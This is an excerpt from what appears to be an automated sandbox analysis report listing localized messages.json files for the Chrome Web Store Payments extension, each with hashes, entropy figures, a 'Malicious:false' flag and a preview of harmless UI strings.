                                                                                                                                                                                SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):787
                                                                                                                                                                                Entropy (8bit):4.973349962793468
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
                                                                                                                                                                                MD5:05C437A322C1148B5F78B2F341339147
                                                                                                                                                                                SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                                                                                                                                                SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                                                                                                                                                SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):593
                                                                                                                                                                                Entropy (8bit):4.483686991119526
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                                MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                                SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                                SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                                SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\en_GB\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):593
                                                                                                                                                                                Entropy (8bit):4.483686991119526
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                                MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                                SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                                SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                                SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):661
                                                                                                                                                                                Entropy (8bit):4.450938335136508
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
                                                                                                                                                                                MD5:82719BD3999AD66193A9B0BB525F97CD
                                                                                                                                                                                SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                                                                                                                                                SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                                                                                                                                                SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\es_419\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):637
                                                                                                                                                                                Entropy (8bit):4.47253983486615
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
                                                                                                                                                                                MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                                                                                                                                                SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                                                                                                                                                SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                                                                                                                                                SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):595
                                                                                                                                                                                Entropy (8bit):4.467205425399467
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
                                                                                                                                                                                MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                                                                                                                                                SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                                                                                                                                                SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                                                                                                                                                SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):647
                                                                                                                                                                                Entropy (8bit):4.595421267152647
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                                                                                                                                                MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                                                SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                                                SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                                                SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):658
                                                                                                                                                                                Entropy (8bit):4.5231229502550745
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                                                                                                                                                MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                                                SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                                                SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                                                SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):677
                                                                                                                                                                                Entropy (8bit):4.552569602149629
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                                                                                                                                                MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                                                SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                                                SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                                                                                                                                                SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):835
                                                                                                                                                                                Entropy (8bit):4.791154467711985
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                                                                                                                                                MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                                                SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                                                SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                                                SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):618
                                                                                                                                                                                Entropy (8bit):4.56999230891419
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                                                                                                                                                MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                                                SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                                                SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                                                SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):683
                                                                                                                                                                                Entropy (8bit):4.675370843321512
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                                                                                                                                                MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                                                SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                                                SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                                                SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):604
                                                                                                                                                                                Entropy (8bit):4.465685261172395
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                                                                                                                                                MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                                                SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                                                SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                                                SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):603
                                                                                                                                                                                Entropy (8bit):4.479418964635223
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                                                                                                                                                MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                                                SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                                                SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                                                SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):697
                                                                                                                                                                                Entropy (8bit):5.20469020877498
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                                                                                                                                                MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                                                SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                                                SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                                                SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):631
                                                                                                                                                                                Entropy (8bit):5.160315577642469
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                                                                                                                                                MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                                                SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                                                                                                                                                SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                                                SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):665
                                                                                                                                                                                Entropy (8bit):4.66839186029557
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                                                                                                                                                MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                                                SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
